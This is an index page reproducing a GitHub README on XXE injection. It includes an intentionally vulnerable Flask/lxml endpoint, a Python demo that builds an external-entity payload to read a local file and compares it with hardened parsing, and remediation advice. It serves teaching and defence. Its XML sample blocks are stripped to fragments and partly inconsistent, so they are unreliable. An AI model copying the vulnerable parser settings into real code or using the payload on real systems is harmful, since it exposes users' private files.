Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/qeeqbox/xxe-injection

A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files

infosecsimplified injection metadata qeeqbox visualization vulnerability xee xml xxe xxe-injection

Last synced: about 2 months ago

README


A threat actor may interfere with an application's processing of extensible markup language (XML) data to view the content of a target's files

## Example #1
1. Threat actor sends a malicious request that contains a reference to an external entity (a system identifier)
2. The target's XML processor replaces the external entity with the content dereferenced by the system identifier

## Code
#### Target Logic
```py
from flask import Flask, request, make_response
from lxml import etree

app = Flask(__name__)


@app.route("/parse_xml", methods=['POST'])
def parse_xml():
    # Vulnerable on purpose: resolve_entities=True lets the parser dereference
    # external entities declared in the DTD of the uploaded document
    parser = etree.XMLParser(resolve_entities=True)
    root = etree.fromstring(request.files['xml'].read(), parser)
    # The expanded tree is echoed back, so the entity's content reaches the sender
    response = make_response(etree.tostring(root), 200)
    response.mimetype = "text/plain"
    return response
```

#### Target-In
```xml

John01
```

#### Target-Out
```
Jone Doe
```

#### Target-In
```xml

]>
&xxe;
```

#### Target-Out
```
usystem01
```
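The two request/response pairs above, worked end to end as an added example (not code from the qeeqbox repository). It uses the standard library's `xml.sax` parser instead of lxml so it runs without third-party packages; the feature flag `feature_external_ges` plays the role of lxml's `resolve_entities`. The entity name `xxe`, the `<user>` element, and the temporary "secret" file are assumptions constructed for the demo, not values from the README.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collect the character data of every element, in document order."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_xml(payload: bytes, resolve_external: bool) -> str:
    """Parse `payload` and return its text content.

    resolve_external=True stands in for the README's resolve_entities=True:
    SYSTEM identifiers declared in the DTD are opened and their content is
    spliced into the document. False is the hardened setting (and the
    default since Python 3.7.1).
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return handler.text()


def xxe_payload(path: str) -> bytes:
    """Attacker request body: a DTD declaring an external general entity whose
    system identifier is a local file, followed by a reference to it.
    Entity and element names are arbitrary (assumed for this example)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE user [<!ENTITY xxe SYSTEM "{path}">]>\n'
        "<user>&xxe;</user>\n"
    ).encode()


def run_demo() -> dict:
    """Parse a benign document and the XXE payload with both parser settings."""
    # Constructed secret file standing in for a target such as /etc/passwd
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("usystem01\n")
        secret_path = fh.name
    try:
        benign = b"<user>John01</user>"
        evil = xxe_payload(secret_path)
        return {
            "benign": parse_xml(benign, resolve_external=True),
            # Vulnerable: the file's content comes back in the response
            "vulnerable": parse_xml(evil, resolve_external=True),
            # Hardened: the entity reference expands to nothing
            "hardened": parse_xml(evil, resolve_external=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name:>10}: {value!r}")
```

The vulnerable parse returns the secret file's content where `&xxe;` stood; the hardened parse returns an empty string for the same payload. For the lxml parser used on this page the equivalent fix is `etree.XMLParser(resolve_entities=False)`; a parser that refuses DTDs altogether, such as the `defusedxml` wrappers, closes the same class of bug.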

## Impact
High

## Names
- XXE injection
- XEE injection
- XML injection

## Risk
- Read data

## Redemption
- Secure processing
- Disable DTD processing and external entity resolution in the XML parser

## ID
4b3566ce-3f7f-40d8-b882-09f59ca967b8

## References
- [wiki](https://en.wikipedia.org/wiki/XML_external_entity_attack)